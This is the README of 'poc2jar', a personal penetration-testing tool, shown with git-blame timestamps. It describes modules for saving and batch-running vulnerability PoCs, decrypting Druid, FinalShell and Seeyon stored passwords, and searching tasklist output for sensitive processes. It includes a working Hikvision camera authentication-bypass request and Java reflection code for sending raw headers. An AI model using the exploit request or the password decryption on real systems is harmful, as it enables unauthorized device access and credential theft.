2021-11-15 22:36:13 +08:00
|
|
|
|
## 2021.11.15更新 v0.4
|
|
|
|
|
|
1.完善密码模块对druid密码的解密,在druid 1.0.16版本及之前
|
|
|
|
|
|

|
|
|
|
|
|
发现有些时候poc利用的还不是很好,emmm在思考怎么优化
|
|
|
|
|
|
|
2021-08-14 20:49:09 +08:00
|
|
|
|
## 2021.8.14更新 v0.3
|
|
|
|
|
|
1.完善对于单个目标进行全部poc检测
|
|
|
|
|
|

|
|
|
|
|
|
|
2021-08-14 21:06:10 +08:00
|
|
|
|
2.python运行命令可在调用python脚本手动设置。
|
2021-08-14 20:49:09 +08:00
|
|
|
|
|
2021-08-14 21:06:10 +08:00
|
|
|
|
3.将python固定至jar包内部,减少config.properties文件;将test.txt固定至jar包内部,减少test.txt文件(对macos来说,windows还未适配)
|
2021-08-14 20:49:09 +08:00
|
|
|
|
|
|
|
|
|
|
后续看看windows怎么减少config.properties文件和test.txt文件,文件说明在最下面都有解释
|
|
|
|
|
|
|
|
|
|
|
|
基本已经完成我所需要的功能了,后续看有必要再次更新
|
|
|
|
|
|
|
2021-08-08 22:08:12 +08:00
|
|
|
|
## 2021.8.8更新 v0.2
|
|
|
|
|
|
1.批量模块更改为python批量,默认用的python3,所以需要配置一下python3命令。(emmm后续再看看改成go试试)
|
|
|
|
|
|
|
|
|
|
|
|
2.添加finalshell密码解密
|
|
|
|
|
|
|
|
|
|
|
|
3.添加seeyon数据库密码解密
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
注:
|
2021-08-08 22:12:33 +08:00
|
|
|
|
|
2021-08-08 22:08:12 +08:00
|
|
|
|
1.增加了pythonexp/poc2jarpiliang.py、url.txt文件,最好重新下载一遍项目里的txt
|
2021-08-08 22:12:33 +08:00
|
|
|
|
|
2021-08-08 22:08:12 +08:00
|
|
|
|
2.property/config.properties增加python2、python3,python脚本默认python2执行
|
|
|
|
|
|
### python批量
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
### finalshell密码解密(支持批量)
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
### seeyon数据库密码解密(支持批量)
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# 源介绍
|
2021-07-03 12:13:53 +08:00
|
|
|
|
# poc2jar
|
2021-07-03 12:57:01 +08:00
|
|
|
|
个人写的很简陋的poc工具,每次遇到新的漏洞爆发出来,都要去复现,复现好以后保存到哪里就成了一个问题了,写这个工具,就是为了解决这个问题,希望能集合到个人主机内,然后可以根据不同的poc来使用
|
2021-07-03 12:13:53 +08:00
|
|
|
|
|
2021-07-03 12:57:01 +08:00
|
|
|
|
工具介绍
|
2021-07-03 12:13:53 +08:00
|
|
|
|
|
|
|
|
|
|
|
2021-07-03 12:57:01 +08:00
|
|
|
|
# poc保存模块
|
|
|
|
|
|
举一个很简单的例子,hikvision的漏洞
|
|
|
|
|
|

|
|
|
|
|
|
截取到数据包如下:
|
|
|
|
|
|
```
|
|
|
|
|
|
GET /onvif-http/snapshot?auth=YWRtaW46MTEK HTTP/1.1
|
|
|
|
|
|
Host:x.x.x.x
|
|
|
|
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
|
|
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
|
|
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
|
|
Connection: keep-alive
|
|
|
|
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
直接放入到poc保存模块里,进行发包
|
|
|
|
|
|

|
|
|
|
|
|
可以看到返回的为二进制的图片,那我们可以把漏洞关键字设置为Content-Type:image/jpeg,只要请求这个路径返回这个,就判断为存在漏洞
|
|
|
|
|
|
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
满足条件,可以保存为yml文件
|
|
|
|
|
|
|
|
|
|
|
|
填入exp名称、yml文件的名称(这里名称需要带入组件,如这里应该为hikvision/test.yml)
|
|
|
|
|
|

|
|
|
|
|
|
至此,保存yml文件成功
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# exp利用模块
|
|
|
|
|
|
直接选择刚刚保 存的yml文件
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
输入刚刚的url,进行测试
|
|
|
|
|
|

|
|
|
|
|
|
存在相应回显即为存在漏洞
|
|
|
|
|
|
|
|
|
|
|
|
## 批量利用(这里多线程没有处理好,暂时不能太多目标,后期想更换为python多线程)
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# tasklist进程搜索模块
|
|
|
|
|
|
这里需要tasklist /svc格式的输入
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# 常用命令模块
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# python利用模块
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## 不足 todo
|
2021-08-14 21:04:36 +08:00
|
|
|
|
~~①.对于一些复杂请求的没有做到兼容测试,还是依赖于python模块去执行~~ 暂时没找到好方法替代
|
2021-07-06 21:21:42 +08:00
|
|
|
|
|
2021-08-14 21:04:36 +08:00
|
|
|
|
~~②.对于多线程没有处理好~~ 用python替代了
|
2021-07-06 21:21:42 +08:00
|
|
|
|
|
2021-08-14 21:04:36 +08:00
|
|
|
|
~~③.对于单个目标可以把对应模块的poc全部测一遍~~
|
2021-07-03 12:57:01 +08:00
|
|
|
|
|
2021-08-14 20:49:09 +08:00
|
|
|
|
④.所需要的文件有点多,考虑办法不需要文件,直接写进jar包内 2021.8.14(部分完成)
|
2021-08-11 18:40:05 +08:00
|
|
|
|
|
|
|
|
|
|
⑤.考虑和goby、xray格式相同(长久来看)
|
2021-08-11 18:38:49 +08:00
|
|
|
|
|
2021-07-03 12:57:01 +08:00
|
|
|
|
## 对文件的说明
|
|
|
|
|
|
①.poc文件夹存放poc文件,即yml文件
|
|
|
|
|
|
|
|
|
|
|
|
②.property文件夹存放cmdlists.txt,即常用命令模块;config.properties,即python路径,或者环境变量下python的调用命令;exetest.txt,即tasklist /svc查找的敏感进程;test.txt是保存的请求包
|
|
|
|
|
|
|
|
|
|
|
|
③.pythonexp文件夹存放的python脚本,usage放在了文件第一行,可以进行调用
|
|
|
|
|
|
|
2021-08-14 20:49:09 +08:00
|
|
|
|
## 安装说明
|
|
|
|
|
|
安装pyyaml库 5.3.1
|
|
|
|
|
|
|
2021-07-03 12:57:01 +08:00
|
|
|
|
|
2021-07-06 21:34:26 +08:00
|
|
|
|
## 运行
|
|
|
|
|
|
|
2021-07-06 21:35:12 +08:00
|
|
|
|
### Mac OS
|
2021-07-06 21:34:26 +08:00
|
|
|
|
直接运行jar即可
|
|
|
|
|
|
|
2021-07-06 21:35:12 +08:00
|
|
|
|
### Windows
|
2021-07-06 21:35:46 +08:00
|
|
|
|
需要在命令行加入参数编码参数,否则会乱码,即
|
2021-07-06 21:35:12 +08:00
|
|
|
|
|
2021-07-06 21:34:26 +08:00
|
|
|
|
java -jar -Dfile.encoding=utf-8 poc2jar.jar
|
|
|
|
|
|
|
|
|
|
|
|
|
2021-08-14 21:02:04 +08:00
|
|
|
|
## 编写过程的难点
|
|
|
|
|
|
其实真正的难点在于发请求,尤其是发POST请求,但是没有Content-type这样的漏洞payload的时候,有些漏洞请求是要POST,但是Content-type是不需要的,这就导致了该项目当时停滞不前,遇到一位大佬帮我解决问题,真的太感谢了,此处艾特董神
|
|
|
|
|
|
主要在于setIfNotSet自动加上了,所以我们重写这个方法
|
|
|
|
|
|
下面给出解决的demo
|
|
|
|
|
|
|
|
|
|
|
|

|
|
|
|
|
|
|
|
|
|
|
|
test类下定义一个setIfNotSet方法
|
|
|
|
|
|
```
|
|
|
|
|
|
public synchronized void setIfNotSet(String arg0, String arg1) {
|
|
|
|
|
|
// System.out.println("hook: " + arg0);
|
|
|
|
|
|
if ("Content-type".equals(arg0)) {
|
|
|
|
|
|
return;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
if ("Connection".equals(arg0)) {
|
|
|
|
|
|
return;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
if ("Accept".equals(arg0)) {
|
|
|
|
|
|
return;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
super.setIfNotSet(arg0, arg1);
|
|
|
|
|
|
}
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
继承test类
|
|
|
|
|
|
```
|
|
|
|
|
|
HttpURLConnection connection = (HttpURLConnection) realUrl.openConnection();
|
|
|
|
|
|
// 设置通用的请求属性
|
|
|
|
|
|
|
|
|
|
|
|
Object target = connection;
|
|
|
|
|
|
if (!target.getClass().equals(sun.net.www.protocol.http.HttpURLConnection.class)) {
|
|
|
|
|
|
//https
|
|
|
|
|
|
Field field1 = connection.getClass().getDeclaredField("delegate");
|
|
|
|
|
|
field1.setAccessible(true);
|
|
|
|
|
|
target = field1.get(connection);
|
|
|
|
|
|
}
|
|
|
|
|
|
Field field2 = sun.net.www.protocol.http.HttpURLConnection.class.getDeclaredField("requests");
|
|
|
|
|
|
field2.setAccessible(true);
|
|
|
|
|
|
test customMessageHeader = new test();
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
2021-07-03 12:57:01 +08:00
|
|
|
|
# 免责声明
|
|
|
|
|
|
请勿将本项目技术或代码应用在恶意软件制作、软件著作权/知识产权盗取或不当牟利等非法用途中。实施上述行为或利用本项目对非自己著作权所有的程序进行数据嗅探将涉嫌违反《中华人民共和国刑法》第二百一十七条、第二百八十六条,《中华人民共和国网络安全法》《中华人民共和国计算机软件保护条例》等法律规定。本项目提及的技术仅可用于私人学习测试等合法场景中,任何不当利用该技术所造成的刑事、民事责任均与本项目作者无关。
|